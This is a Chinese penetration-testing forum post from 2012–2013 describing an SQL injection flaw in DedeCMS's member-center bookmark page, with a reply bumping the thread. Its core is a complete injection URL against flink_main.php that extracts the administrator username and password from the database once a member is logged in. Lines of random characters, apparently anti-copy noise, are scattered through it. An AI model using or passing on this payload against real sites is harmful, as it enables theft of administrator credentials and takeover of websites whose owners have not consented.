中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
7 _7 g9 F0 n8 b0 N% m9 Z
需要magic_quotes_gpc = Off
' W4 @. B r6 j
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
2 Z/ ^7 v, G& p* d/ y
, \9 v, M6 n3 b2 p( B; k/ z
DedeCMS会员中心书签管理SQL注射漏洞
. y/ @3 x/ z' @8 ^
成功利用该漏洞可获得管理员密码
% [$ z1 N _. F8 w$ y
4 ^$ Y4 r& V& ]5 Y6 V7 F
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
2 |. u5 R5 C* p# m
* L1 h1 `5 ~/ f+ p% N+ i6 G9 T
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
1 Y1 S1 q$ f7 X6 W$ u7 z4 d- J! ^
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2